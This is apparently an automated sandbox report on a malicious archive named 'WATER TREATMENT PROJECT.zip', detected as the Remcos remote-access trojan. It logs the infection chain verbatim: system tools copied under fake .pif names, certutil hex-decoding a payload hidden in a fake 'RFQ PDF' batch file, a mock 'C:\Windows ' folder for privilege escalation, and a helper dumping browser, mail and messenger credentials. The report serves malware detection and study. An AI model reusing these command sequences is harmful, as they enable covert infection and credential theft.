Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Users\Public\rdha.pif	Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 35_2_05362933 cpuid

35_2_05362933

Source: C:\Users\Public\ANYDESK.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	26_2_02B054BC
Source: C:\Users\Public\ANYDESK.PIF	Code function: GetLocaleInfoA,	26_2_02B0A0B8
Source: C:\Users\Public\ANYDESK.PIF	Code function: GetLocaleInfoA,	26_2_02B0A104
Source: C:\Users\Public\ANYDESK.PIF	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	26_2_02B055C8
Source: C:\Users\Public\ANYDESK.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	60_2_02A254BC
Source: C:\Users\Public\ANYDESK.PIF	Code function: GetLocaleInfoA,	60_2_02A2A104
Source: C:\Users\Public\ANYDESK.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	60_2_02A255C7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_004520E2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_00452097
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_0045217D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	62_2_0040F26B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	62_2_0045220A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_0044844E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	62_2_0045245A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	62_2_00452583
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	62_2_0045268A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	62_2_00452757
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	62_2_00448937
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	62_2_00451E1F
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	62_2_068797C5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	62_2_06883411
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	62_2_068835E5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	62_2_06883518
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_068792DC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	62_2_068832E8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	62_2_068400F9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_0688300B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_06882F25
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	62_2_06882F70
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	62_2_06882CAD

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\recover.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B08B38 GetLocalTime,

26_2_02B08B38

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B19F00 GetUserNameA,

26_2_02B19F00

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

62_2_004491DA

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B0B038 GetVersionExA,

26_2_02B0B038

Source: C:\Windows\SysWOW64\colorcpl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

62_2_0040B59B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		62_2_0040B6B5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \key3.db		62_2_0040B6B5

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\recover.exe	Code function: ESMTPPassword	49_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	49_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	49_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 35.3.colorcpl.exe.2ef626a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: recover.exe PID: 4564, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-14MUP4			Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-14MUP4

Yara detected Remcos RAT

Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: cmd.exe

62_2_00405091

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	11 Native API	1 Scripting	1 DLL Side-Loading	2 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Valid Accounts	1 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	11 Access Token Manipulation	1 Timestomp	3 Credentials In Files	3 File and Directory Discovery	Distributed Component Object Model	111 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	1 Windows Service	1 DLL Side-Loading	LSA Secrets	38 System Information Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	611 Process Injection	1 Bypass User Account Control	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	22 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	221 Masquerading	DCSync	2 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Access Token Manipulation	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	611 Process Injection	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WATER TREATMENT PROJECT.zip

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
WATER TREATMENT PROJECT.zip